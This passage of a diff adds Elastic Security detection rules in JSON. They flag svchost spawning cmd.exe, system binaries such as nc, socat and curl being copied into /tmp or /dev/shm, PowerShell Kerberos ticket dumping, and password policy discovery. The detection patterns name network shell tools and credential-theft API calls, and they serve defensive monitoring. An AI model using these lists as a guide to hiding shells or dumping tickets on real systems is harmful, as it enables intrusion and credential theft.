prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:windows and event.category:process and event.type:start and process.parent.name:\"svchost.exe\" and process.name:(\"cmd.exe\" or \"Cmd.exe\" or \"CMD.EXE\")\n", + "references": [ + "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 211 + }, + "id": "fd7a6052-58fa-4397-93c3-4795249ccfa2_211", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_6.json b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_6.json new file mode 100644 index 00000000000..ed0a1112f47 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_6.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Binary Copied and/or Moved to Suspicious Directory", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.name in (\"cp\", \"mv\") and process.args : (\n // Shells\n \"/bin/*sh\", \"/usr/bin/*sh\", \n\n // Interpreters\n \"/bin/python*\", \"/usr/bin/python*\", \"/bin/php*\", \"/usr/bin/php*\", \"/bin/ruby*\", \"/usr/bin/ruby*\", \"/bin/perl*\",\n \"/usr/bin/perl*\", \"/bin/lua*\", \"/usr/bin/lua*\", \"/bin/java*\", \"/usr/bin/java*\", \n\n // Compilers\n \"/bin/gcc*\", \"/usr/bin/gcc*\", \"/bin/g++*\", \"/usr/bin/g++*\", \"/bin/cc\", \"/usr/bin/cc\",\n\n // Suspicious utilities\n \"/bin/nc\", \"/usr/bin/nc\", \"/bin/ncat\", \"/usr/bin/ncat\", \"/bin/netcat\", \"/usr/bin/netcat\", \"/bin/nc.openbsd\",\n \"/usr/bin/nc.openbsd\", \"/bin/*awk\", \"/usr/bin/*awk\", \"/bin/socat\", \"/usr/bin/socat\", \"/bin/openssl\",\n \"/usr/bin/openssl\", \"/bin/telnet\", \"/usr/bin/telnet\", \"/bin/mkfifo\", \"/usr/bin/mkfifo\", \"/bin/mknod\",\n \"/usr/bin/mknod\", \"/bin/ping*\", \"/usr/bin/ping*\", \"/bin/nmap\", \"/usr/bin/nmap\",\n\n // System utilities\n \"/bin/ls\", \"/usr/bin/ls\", \"/bin/cat\", \"/usr/bin/cat\", \"/bin/sudo\", \"/usr/bin/sudo\", \"/bin/curl\", \"/usr/bin/curl\",\n \"/bin/wget\", \"/usr/bin/wget\", \"/bin/tmux\", \"/usr/bin/tmux\", \"/bin/screen\", \"/usr/bin/screen\", \"/bin/ssh\",\n \"/usr/bin/ssh\", \"/bin/ftp\", \"/usr/bin/ftp\"\n ) and not process.parent.name in (\"dracut-install\", \"apticron\", \"generate-from-dir\", \"platform-python\")]\n [file where host.os.type == \"linux\" and event.action == \"creation\" and file.path : (\n \"/dev/shm/*\", \"/run/shm/*\", \"/tmp/*\", \"/var/tmp/*\", \"/run/*\", \"/var/run/*\", \"/var/www/*\", \"/proc/*/fd/*\"\n ) and not file.path : (\"/tmp/rear*\", \"/var/tmp/rear*\", \"/var/tmp/dracut*\", \"/var/tmp/mkinitramfs*\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fda1d332-5e08-4f27-8a9b-8c802e3292a6", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "fda1d332-5e08-4f27-8a9b-8c802e3292a6_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_7.json b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_7.json new file mode 100644 index 00000000000..adf8dcfd638 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_7.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Binary Copied and/or Moved to Suspicious Directory", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.name in (\"cp\", \"mv\") and process.args : (\n // Shells\n \"/bin/*sh\", \"/usr/bin/*sh\", \n\n // Interpreters\n \"/bin/python*\", \"/usr/bin/python*\", \"/bin/php*\", \"/usr/bin/php*\", \"/bin/ruby*\", \"/usr/bin/ruby*\", \"/bin/perl*\",\n \"/usr/bin/perl*\", \"/bin/lua*\", \"/usr/bin/lua*\", \"/bin/java*\", \"/usr/bin/java*\", \n\n // Compilers\n \"/bin/gcc*\", \"/usr/bin/gcc*\", \"/bin/g++*\", \"/usr/bin/g++*\", \"/bin/cc\", \"/usr/bin/cc\",\n\n // Suspicious utilities\n \"/bin/nc\", \"/usr/bin/nc\", \"/bin/ncat\", \"/usr/bin/ncat\", \"/bin/netcat\", \"/usr/bin/netcat\", \"/bin/nc.openbsd\",\n \"/usr/bin/nc.openbsd\", \"/bin/*awk\", \"/usr/bin/*awk\", \"/bin/socat\", \"/usr/bin/socat\", \"/bin/openssl\",\n \"/usr/bin/openssl\", \"/bin/telnet\", \"/usr/bin/telnet\", \"/bin/mkfifo\", \"/usr/bin/mkfifo\", \"/bin/mknod\",\n \"/usr/bin/mknod\", \"/bin/ping*\", \"/usr/bin/ping*\", \"/bin/nmap\", \"/usr/bin/nmap\",\n\n // System utilities\n \"/bin/ls\", \"/usr/bin/ls\", \"/bin/cat\", \"/usr/bin/cat\", \"/bin/sudo\", \"/usr/bin/sudo\", \"/bin/curl\", \"/usr/bin/curl\",\n \"/bin/wget\", \"/usr/bin/wget\", \"/bin/tmux\", \"/usr/bin/tmux\", \"/bin/screen\", \"/usr/bin/screen\", \"/bin/ssh\",\n \"/usr/bin/ssh\", \"/bin/ftp\", \"/usr/bin/ftp\"\n ) and not process.parent.name in (\"dracut-install\", \"apticron\", \"generate-from-dir\", \"platform-python\")]\n [file where host.os.type == \"linux\" and event.action == \"creation\" and file.path : (\n \"/dev/shm/*\", \"/run/shm/*\", \"/tmp/*\", \"/var/tmp/*\", \"/run/*\", \"/var/run/*\", \"/var/www/*\", \"/proc/*/fd/*\"\n ) and not file.path : (\"/tmp/rear*\", \"/var/tmp/rear*\", \"/var/tmp/dracut*\", \"/var/tmp/mkinitramfs*\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fda1d332-5e08-4f27-8a9b-8c802e3292a6", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 7 + }, + "id": "fda1d332-5e08-4f27-8a9b-8c802e3292a6_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_4.json b/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_4.json new file mode 100644 index 00000000000..117cdbffcf8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_4.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that have the capability of dumping Kerberos tickets from LSA, which potentially indicates an attacker's attempt to acquire credentials for lateral movement.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Kerberos Ticket Dump", + "note": "## Triage and analysis\n\n### Investigating PowerShell Kerberos Ticket Dump\n\nKerberos is an authentication protocol that relies on tickets to grant access to network resources. Adversaries may abuse this protocol to acquire credentials for lateral movement within a network.\n\nThis rule indicates the use of scripts that contain code capable of dumping Kerberos tickets, which can indicate potential PowerShell abuse for credential theft.\n\n### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate if the script was executed, and if so, which account was targeted.\n- Identify the account involved and contact the owner to confirm whether they are aware of this activity.\n- Check if the script has any other functionality that can be potentially malicious.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate other potentially compromised accounts and hosts. Review login events (like 4624) for suspicious events involving the subject and target accounts.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of file path and user ID conditions.\n\n### Related Rules\n\n- PowerShell Kerberos Ticket Request - eb610e70-f9e6-4949-82b9-f1c5bcd37c39\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Disable or limit involved accounts during the investigation and response.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"LsaCallAuthenticationPackage\" and\n (\n \"KerbRetrieveEncodedTicketMessage\" or\n \"KerbQueryTicketCacheMessage\" or\n \"KerbQueryTicketCacheExMessage\" or\n \"KerbQueryTicketCacheEx2Message\" or\n \"KerbRetrieveTicketMessage\" or\n \"KerbDecryptDataMessage\"\n )\n )\n", + "references": [ + "https://github.com/MzHmO/PowershellKerberos/blob/main/dumper.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "fddff193-48a3-484d-8d35-90bb3d323a56", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "fddff193-48a3-484d-8d35-90bb3d323a56_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_4.json b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_4.json new file mode 100644 index 00000000000..cfd26df41d7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_4.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Password Policy Discovery Capabilities", + "query": "event.category: \"process\" and host.os.type:windows and\n(\n powershell.file.script_block_text: (\n \"Get-ADDefaultDomainPasswordPolicy\" or\n \"Get-ADFineGrainedPasswordPolicy\" or\n \"Get-ADUserResultantPasswordPolicy\" or\n \"Get-DomainPolicy\" or\n \"Get-GPPPassword\" or\n \"Get-PassPol\"\n )\n or\n powershell.file.script_block_text: (\n (\"defaultNamingContext\" or \"ActiveDirectory.DirectoryContext\" or \"ActiveDirectory.DirectorySearcher\") and\n (\n (\n \".MinLengthPassword\" or\n \".MinPasswordAge\" or\n \".MaxPasswordAge\"\n ) or\n (\n \"minPwdAge\" or\n \"maxPwdAge\" or\n \"minPwdLength\"\n ) or\n (\n \"msDS-PasswordSettings\"\n )\n )\n )\n) and not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n and not \n (\n powershell.file.script_block_text : (\"43c15630-959c-49e4-a977-758c5cc93408\" and \"CmdletsToExport\" and \"ActiveDirectory.Types.ps1xml\")\n )\n and not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fe25d5bc-01fa-494a-95ff-535c29cc4c96", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1201", + "name": "Password Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1201/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "fe25d5bc-01fa-494a-95ff-535c29cc4c96_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_5.json b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_5.json new file mode 100644 index 00000000000..40298b4a0ae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_5.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Password Policy Discovery Capabilities", + "query": "event.category: \"process\" and host.os.type:windows and\n(\n powershell.file.script_block_text: (\n \"Get-ADDefaultDomainPasswordPolicy\" or\n \"Get-ADFineGrainedPasswordPolicy\" or\n \"Get-ADUserResultantPasswordPolicy\" or\n \"Get-DomainPolicy\" or\n \"Get-GPPPassword\" or\n \"Get-PassPol\"\n )\n or\n powershell.file.script_block_text: (\n (\"defaultNamingContext\" or \"ActiveDirectory.DirectoryContext\" or \"ActiveDirectory.DirectorySearcher\") and\n (\n (\n \".MinLengthPassword\" or\n \".MinPasswordAge\" or\n \".MaxPasswordAge\"\n ) or\n (\n \"minPwdAge\" or\n \"maxPwdAge\" or\n \"minPwdLength\"\n ) or\n (\n \"msDS-PasswordSettings\"\n )\n )\n )\n) and not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n and not \n (\n powershell.file.script_block_text : (\"43c15630-959c-49e4-a977-758c5cc93408\" and \"CmdletsToExport\" and \"ActiveDirectory.Types.ps1xml\")\n )\n and not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fe25d5bc-01fa-494a-95ff-535c29cc4c96", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v 